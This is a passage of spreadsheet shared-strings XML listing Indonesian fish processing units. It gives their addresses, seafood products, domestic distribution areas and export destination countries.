    <t>Jl. Raya By Pass BIL KM-15, Kel. Jonggat, Kec. Labulia, Kabupaten Lombok Tengah&lt;br&gt;Nusa Tenggara Barat</t>
  </si>
  <si>
    <t>Kabupaten Lombok Tengah</t>
  </si>
  <si>
    <t>Taman Pergudangan dan Perkantoran Muara Baru Blok C5-C6, Jl. Muara Baru Raya No. 30, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Utara, Kabupaten Bekasi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Senangin, Manyung, Layur, Kakap Merah)</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Barakuda, Deho, Kembung, Layang, Cakalang, Tenggiri, Salem)</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Karawang, Kabupaten Bekasi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Sri Lanka, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Patin, Nila)</t>
  </si>
  <si>
    <t>Dusun Krajan I RT 001 RW 003, Desa Bangsring, Kec. Wongsorejo, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jorong Setia Budi, Kel. Simalidu, Kec. Koto Salak, Kabupaten Dharmasraya&lt;br&gt;Sumatera Barat</t>
  </si>
  <si>
    <t>Kabupaten Dharmasraya</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok F No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Layur, Bawal, Barramundi)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Tangerang</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Lemuru, Tembang, Kembung, Japuh, Selar, Layang, Sunglir, Selangat)</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kota Jakarta Utara, Kota Tangerang</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Teri, Lemuru, Terbang, Kembung, Japuh, Selar, Layang, Sunglir, Selangat)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Layur, Bawal, Barramundi)</t>
  </si>
  <si>
    <t>Jl. Tuna 2 Blok K No. 7B Room C, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Salem, Sarden)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Indramayu, Kabupaten Bekasi, Kabupaten Pati, Kabupaten Tuban, Kabupaten Pandeglang, Kabupaten Lebak, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Jl. Alor Komplek PPI Oeba, Kel. Fatubesi, Kec. Kota Lama, Kota Kupang&lt;br&gt;Nusa Tenggara Timur</t>
  </si>
  <si>
    <t>Russian Federation, Singapore, United States, Viet Nam</t>
  </si>
  <si>
    <t>Kabupaten Purwakarta, Kabupaten Pekalongan, Kabupaten Pemalang, Kabupaten Tegal, Kabupaten Brebes, Kota Semarang, Kota Pekalongan, Kota Tegal</t>
  </si>
  <si>
    <t>Nugget Ikan</t>
  </si>
  <si>
    <t>Kabupaten Semarang, Kabupaten Pekalongan, Kabupaten Pemalang, Kabupaten Tegal, Kabupaten Brebes, Kota Semarang, Kota Pekalongan, Kota Tegal</t>
  </si>
  <si>
    <t>Stik Ikan</t>
  </si>
  <si>
    <t>Kabupaten Purwakarta, Kabupaten Semarang, Kabupaten Pekalongan, Kabupaten Pemalang, Kabupaten Tegal, Kabupaten Brebes, Kota Semarang, Kota Pekalongan, Kota Tegal</t>
  </si>
  <si>
    <t xml:space="preserve">Bakso Ikan </t>
  </si>
  <si>
    <t>Plawonan, Kel. Argomulyo, Kec. Sedayu, Kabupaten Bantul&lt;br&gt;Daerah Istimewa Yogyakarta</t>
  </si>
  <si>
    <t>Kota Cirebon, Kabupaten Cilacap, Kota Semarang, Kabupaten Kulon Progo, Kabupaten Bantul, Kabupaten Gunung Kidul, Kabupaten Sleman, Kota Yogyakarta, Kota Surabaya</t>
  </si>
  <si>
    <t>Pepes Ikan</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Cirebon, Kabupaten Cilacap, Kabupaten Semarang, Kabupaten Kulon Progo, Kabupaten Bantul, Kabupaten Gunung Kidul, Kabupaten Sleman, Kota Yogyakarta, Kabupaten Jember, Kota Surabaya</t>
  </si>
  <si>
    <t>Pepes Bandeng</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kabupaten Cirebon, Kabupaten Cilacap, Kabupaten Kulon Progo, Kabupaten Bantul, Kabupaten Gunung Kidul, Kabupaten Sleman, Kota Yogyakarta, Kota Surabaya</t>
  </si>
  <si>
    <t>Otak-Otak Tuna</t>
  </si>
  <si>
    <t>Kabupaten Cirebon, Kabupaten Cilacap, Kabupaten Kulon Progo, Kabupaten Bantul, Kabupaten Gunung Kidul, Kabupaten Sleman, Kota Yogyakarta</t>
  </si>
  <si>
    <t>Komplek Tempat Pelelangan Ikan (TPI) Unit 2 RT 03 RW 03, Kel. Bendar, Kec. Juwana, Kabupaten Pati&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Sero, Layang, Salem)</t>
  </si>
  <si>
    <t>Kabupaten Rembang, Kabupaten Pati, Kabupaten Jepara, Kabupaten Demak</t>
  </si>
  <si>
    <t>Jl. M. Said Gg. Polewali, Kel. Lok Bahu, Kec. Sungai Kunjang, Kota Samarinda&lt;br&gt;Kalimantan Timur</t>
  </si>
  <si>
    <t>Kabupaten Kutai Kartanegara, Kota Balikpapan, Kota Samarinda</t>
  </si>
  <si>
    <t>Jl. Tuna VI Blok A No.2, Muara Baru Ujung, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Layur, Kakatua, Kakap, Kurisi, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Barakuda, Gabus Laut, Kembung, Marlin, Layaran, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Scombroid Beku (Salem)</t>
  </si>
  <si>
    <t>Australia, China, Korea, Democratic People's Republic of, Taiwan, Province of China, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Makerel Atlantik)</t>
  </si>
  <si>
    <t>Kabupaten Pemalang, Kabupaten Tegal, Kabupaten Brebes</t>
  </si>
  <si>
    <t>Pangsit Keong</t>
  </si>
  <si>
    <t>Jl. Margomulyo 4 E, Kel. Tandes, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Belgium, France, Germany, Netherlands, United States</t>
  </si>
  <si>
    <t>Jl. By Pass Ngurah Rai No.626 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>China, Hong Kong, Philippines, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Philippines, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Philippines, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Swanggi, Kerapu, Layur, Kakatua, Bawal, Kakap, Kurisi, Barramundi)</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Korea, Democratic People's Republic of, Philippines, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Layang, Sillago, Tenggiri, Ekor Kuning)</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Korea, Democratic People's Republic of, Philippines, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>China, Hong Kong, Korea, Democratic People's Republic of, Philippines, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Barat, Komplek SSU Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Daging Kepiting Kaleng</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Bandung, Kota Surabaya, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Jl. Gabion Pelabuhan Perikanan Belawan No.98, Kel. Bagan Deli, Kec. Medan-Belawan, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kembung)</t>
  </si>
  <si>
    <t>Kota Pematang Siantar, Kota Tebing Tinggi, Kota Medan</t>
  </si>
  <si>
    <t>Jl. MT. Haryono No.7 RT 010 RW 006, Kel. Cawang, Kec. Kramat Jati, Kota Jakarta Timur&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kabupaten Bekasi</t>
  </si>
  <si>
    <t>Jl. Raya Maspion Romokalisari 1/7 (C-07), Kel. Romokalisari, Kec. Benowo, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Greenland International Industrial Center (GIIC), Jl. Boulevard Blok CB No.01, Desa Sukamukti, Kec. Bojong Mangu, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Jakarta Barat, Kota Bandung, Kabupaten Tangerang, Kota Tangerang</t>
  </si>
  <si>
    <t>Australia, France, Italy, Japan</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerisi, Lencam, Biji Nangka, Kerapu, Kakatua, Kakap, Ekor Kuning, Barramundi)</t>
  </si>
  <si>
    <t>Australia, France, United States</t>
  </si>
  <si>
    <t>France, Italy, Japan, Netherlands, United States</t>
  </si>
  <si>
    <t>Australia, France, Italy, Netherlands</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Amberjack, Lemuru, Mata Besar, Deho, Setan, Lemadang, Marlin, Semar, Sarden, Cakalang, Tenggiri, Todak)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerisi, Lencam, Biji Nangka, Kerapu, Kakatua, Kakap, Ekor Kuning, Barramundi)</t>
  </si>
  <si>
    <t>Kota Batam, Kota Jakarta Pusat</t>
  </si>
  <si>
    <t>Jl. Sampangan, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Pangkal Pinang, Kota Tasikmalaya</t>
  </si>
  <si>
    <t>Pantai Solop RT 04 RW 03, Kel. Pulau Cawan, Kec. Mandah, Kabupaten Indragiri Hilir&lt;br&gt;Riau</t>
  </si>
  <si>
    <t>ANTAMAIQ</t>
  </si>
  <si>
    <t>Jl. Arwana 1 BTN Taman Mutiara, Kel. Pagutan Barat, Kec. Mataram, Kota Mataram&lt;br&gt;Nusa Tenggara Barat</t>
  </si>
  <si>
    <t>Abon Ikan Gabus</t>
  </si>
  <si>
    <t>Kota Pekanbaru, Kota Jakarta Selatan, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Surakarta, Kota Salatiga, Kota Yogyakarta, Kabupaten Ponorogo, Kabupaten Jombang, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Barat, Kabupaten Lombok Tengah, Kabupaten Lombok Timur, Kabupaten Sumbawa, Kabupaten Sumbawa Barat, Kabupaten Lombok Utara, Kota Mataram, Kota Pontianak, Kota Banjarmasin, Kota Makassar, Kota Parepare, Kota Baubau</t>
  </si>
  <si>
    <t>Jl. Kima Raya 1 Kav B5, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Marlin, Layang, Cakalang, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Kembung, Marlin, Layang, Cakalang, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Anggoli, Kerapu, Layur, Sukang, Kakatua, Kakap, Kaci-kaci, Kurau)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Anggoli, Kerapu, Layur, Sukang, Kakatua, Kakap, Kaci-kaci, Kurau)</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Raya Barat No.6 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Hiu Segar</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Japan, Taiwan, Province of China, Thailand, United States</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Japan, Singapore, Taiwan, Province of China, Thailand, United States</t>
  </si>
  <si>
    <t>Hong Kong, Malaysia, Thailand</t>
  </si>
  <si>
    <t>China, Hong Kong, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Kabupaten Bogor, Kabupaten Bandung</t>
  </si>
  <si>
    <t>China, Korea, Republic of, Malaysia, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Kabupaten Toli-Toli</t>
  </si>
  <si>
    <t>Australia, Malaysia</t>
  </si>
  <si>
    <t>China, Korea, Republic of</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Lemuru, Kembung, Marlin, Sarden, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>China, Korea, Republic of, Malaysia, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>China, Hong Kong, Korea, Republic of, Malaysia</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Swanggi, Kerapu, Layur, Bawal, Kakap, Kuro, Kurisi, Ekor Kuning)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Kembung, Marlin, Sarden, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Kuwe, Kerapu, Layur, Bawal, Kakap, Kuro)</t>
  </si>
  <si>
    <t>China, Hong Kong, Korea, Republic of, Malaysia, Thailand</t>
  </si>
  <si>
    <t>Jl. Lambung Mangkurat RT 013 RW 006, Kel. Gunung Makmur, Kec. Takisung, Kabupaten Tanah Laut&lt;br&gt;Kalimantan Selatan</t>
  </si>
  <si>
    <t>Jl. Besar Teluk Nibung, Kel. Pematang Pasir, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Jl. Gajah Mada Km 4, Kel. Banyudono, Kec. Kaliori, Kabupaten Rembang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Kompleks Pelabuhan Perikanan Pantai Tumumpa, Kel. Tumumpa Dua, Kec. Tuminting, Kota Manado&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Makassar</t>
  </si>
  <si>
    <t>Japan, Malaysia, Singapore, Thailand</t>
  </si>
  <si>
    <t>Tuna Steak Segar</t>
  </si>
  <si>
    <t>Tuna Saku Beku</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kota Semarang, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Mackerel, Lemuru, Sarden, Layang, Tongkol, Baby Tuna, Kembung, Deho, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Bogor</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Kerapu, Kaneke, Laccukang, Guntur)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Kaneke, Laccukang, Kakap Merah, Guntur)</t>
  </si>
  <si>
    <t>Korea, Democratic People's Republic of, United States</t>
  </si>
  <si>
    <t>Russian Federation, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Pantai Bacan, Jl. Raya Desa Panamboang, Kel. Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Bawal, Kakap Merah, Samge)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Deho, Selayang, Cakalang, Selar Kuning)</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Russian Federation</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, United States</t>
  </si>
  <si>
    <t>Jl. Teluk Waya, Kel. Waiya, Kec. Depapre, Kabupaten Jayapura&lt;br&gt;Papua</t>
  </si>
  <si>
    <t>Sri Lanka, United Arab Emirates, United Kingdom</t>
  </si>
  <si>
    <t>Jl. Pantai Sari No.1 Komplek Techno Park Perikanan, Kel. Panjang Wetan, Kec. Pekalongan Utara, Kota Pekalongan&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Mata Goyang, Layur, Gulama, Bawal, Kakap, Kurisi, Jaket, Cunang)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Cirebon, Kabupaten Pati, Kabupaten Pekalongan, Kabupaten Tegal, Kota Semarang, Kota Pekalongan, Kabupaten Tuban, Kabupaten Lamongan</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Kembung, Layang)</t>
  </si>
  <si>
    <t>Jl. Plantar KUD, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Jahan, Manyung, Kerapu, Bawal, Kakap, Kaci-kaci, Kurisi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Mata Besar, Tongkol, Kembung, Selar, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Plantar I No.59 H, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Selar, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Bawal, Kerapu, Kakap, Kurisi, Ekor Kuning)</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok S Kav 8-10, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Emperor, Lencam, Kerapu, Layur, Kakatua, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Japan, Korea, Democratic People's Republic of, Malaysia, Mauritius, South Africa, Suriname, Taiwan, Province of China, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Japan, Korea, Democratic People's Republic of, Malaysia, Mauritius, Philippines, Singapore, South Africa, Suriname, Taiwan, Province of China, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Suriname</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Layang, Cakalang, Tenggiri, Todak)</t>
  </si>
  <si>
    <t>Central African Republic, Japan, Korea, Democratic People's Republic of, Malaysia, Mauritius, Philippines, Singapore, South Africa, Suriname, Taiwan, Province of China, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Pergudangan Sinar Buduran 3 Blok B23, Kel. Siwalan Panji, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Deho, Kembung, Malalugis, Lemadang, Marlin, Meka, Cakalang)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Rembang, Kabupaten Pati, Kabupaten Trenggalek, Kabupaten Tulungagung, Kabupaten Malang, Kabupaten Lumajang, Kabupaten Banyuwangi, Kabupaten Probolinggo, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Tuban, Kabupaten Lamongan, Kabupaten Bangkalan, Kabupaten Sampang, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya</t>
  </si>
  <si>
    <t>Pulau Siali RT 019 RW 005, Kel. Kasu, Kec. Belakang Padang, Kota Batam&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Japuh, Selar, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Jahan, Kerapu, Lebam, Bawal, Talang-talang, Kapas-kapas, Kakap, Kaci-kaci, Kurisi, Ekor Kuning, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kakap Putih, Kerapu, Kakap Merah)</t>
  </si>
  <si>
    <t>Australia, Malaysia, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Dusun Sibaganding, Kel. Janggir Leto, Kec. Panei, Kabupaten Simalungun&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Air Tawar Bernilai Tambah Beku (Fillet Nila Sambal Pedas Manis Thailand)</t>
  </si>
  <si>
    <t>Kerupuk Cumi-cumi</t>
  </si>
  <si>
    <t>Jl. Tenis Gg. Pro XL No.17 RT 38, Kel. Api-Api, Kec. Bontang Utara, Kota Bontang&lt;br&gt;Kalimantan Timur</t>
  </si>
  <si>
    <t>Kota Bontang</t>
  </si>
  <si>
    <t xml:space="preserve"> Jl. Muara Baru RT 22 RW 17 Room 8, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Layur, Bawal, Samge, Kakap, Kuro, Cunang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Salem, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ubur-ubur Beku</t>
  </si>
  <si>
    <t>Jl. Muara Baru RT 22 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Layur, Samge, Kuro, Cunang)</t>
  </si>
  <si>
    <t>Jl. Muara Baru RT 22 RW 17 Room 7, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bawal, Kerapu, Layur, Samge, Kuro, Cunang)</t>
  </si>
  <si>
    <t>Jl. Sampangan No.19, Kel. Desa Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Sampangan No. 19 Muncar, Kel. Desa Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Sukang)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kabupaten Bandung, Kota Denpasar</t>
  </si>
  <si>
    <t>Jl. Sampangan No.19, Desa Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Medan, Kota Pekanbaru, Kota Jambi, Kota Palembang, Kota Bandar Lampung, Kota Balikpapan, Kota Samarinda, Kota Ternate, Kota Sorong, Kabupaten Merauke</t>
  </si>
  <si>
    <t>Jl. Gajah Mada No.3-5 RT 001 RW 008 Komplek Duta Merlin Blok B 31-32, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Banjar, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Kota Medan, Kota Denpasar</t>
  </si>
  <si>
    <t>Japan, Korea, Democratic People's Republic of, Mauritius, Seychelles, Singapore, Sri Lanka, Suriname, Taiwan, Province of China, Thailand, United States</t>
  </si>
  <si>
    <t>Jalan Cibolang Raya Gang Swadaya RT.28/06, Kel. Cibatu, Kec. Cisaat, Kabupaten Sukabumi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Baby Fish</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Jakarta Pusat, Kabupaten Sukabumi, Kabupaten Cianjur, Kabupaten Bandung, Kota Sukabumi, Kota Bandung</t>
  </si>
  <si>
    <t>Sereal Patin</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kabupaten Sukabumi, Kabupaten Cianjur, Kota Sukabumi, Kota Bandung</t>
  </si>
  <si>
    <t>Jl. Kepiting RT 03, Kel. Juata Laut, Kec. Tarakan Utara, Kota Tarakan&lt;br&gt;Kalimantan Utara</t>
  </si>
  <si>
    <t>Hong Kong, Japan, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Escolar, Semar, Ayam-ayam)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Cakalang)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Surabaya, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Jl. Desa Gintungkerta, Kel. Gintungkerta, Kec. Klari, Kabupaten Karawang&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Australia, Canada, Germany, Hong Kong, Japan, Korea, Democratic People's Republic of, Singapore, South Africa, Taiwan, Province of China, United States</t>
  </si>
  <si>
    <t>Jl. P. Aji Iskandar RT 016, Kel. Juata Laut, Kec. Tarakan Utara, Kota Tarakan&lt;br&gt;Kalimantan Utara</t>
  </si>
  <si>
    <t>Udang Nobashi Beku</t>
  </si>
  <si>
    <t>Desa Prigri RT 005 RW 001, Kel. Prigi, Kec. Watulimo, Kabupaten Trenggalek&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Komplek Pergudangan dan Industri PT. Meiko Abadi Blok C-51, Kel. Wedi, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kakap Putih, Kerapu, Layur, Jenaha, Sukang, Bawal, Barramundi)</t>
  </si>
  <si>
    <t>Jl. Mundu Pesisir No. 33 Km 4.3, Kel. Mundu Pesisir, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Jakarta Utara, Kota Bogor, Kota Bekasi, Kota Cimahi, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Brunei Darussalam, Japan, Philippines, Saudi Arabia, Thailand, United Arab Emirates, United States</t>
  </si>
  <si>
    <t>Udang Bernilai Tambah Beku (Tempura Udang, Pangsit Udang, Ebi Katsu, Siomay Udang, Bakso Udang, Kakiage Ebi, Golden Money Bag, Tempura Set Udang)</t>
  </si>
  <si>
    <t>Brunei Darussalam, Japan, Philippines, United Arab Emirates, United States</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Hoki)</t>
  </si>
  <si>
    <t>Jl. Kapuk Kamal VII No.73 RT 3 RW 3, Kel. Kamal Muara, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Australia, China, India, Japan, Korea, Democratic People's Republic of, Norway, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Sebelah, Kerapu, Monkfish, Kakap, Seabass)</t>
  </si>
  <si>
    <t>Jl. Majapahit No.1, Kel. Tegalkatimulyan, Kec. Cilacap Selatan, Kabupaten Cilacap&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kabupaten Cilacap, Kota Yogyakarta</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Singapore, United States, Viet Nam</t>
  </si>
  <si>
    <t>Australia, China, Korea, Democratic People's Republic of, Singapore, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Layur, Bawal, Samge, Kuro, Kurisi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Baby Tuna, Panni, Tongkol, Kembung, Salem, Cakalang, Tenggiri, Lemadang)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Layur, Lemadang, Bawal, Samge, Kuro, Kurisi)</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Singapore, United States, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Majapahit No 1, Kel. Tegalkatimulyan, Kec. Cilacap Selatan, Kabupaten Cilacap&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Mata Besar, Tongkol, Kembung, Salem, Cakalang, Tenggiri, Lemadang)</t>
  </si>
  <si>
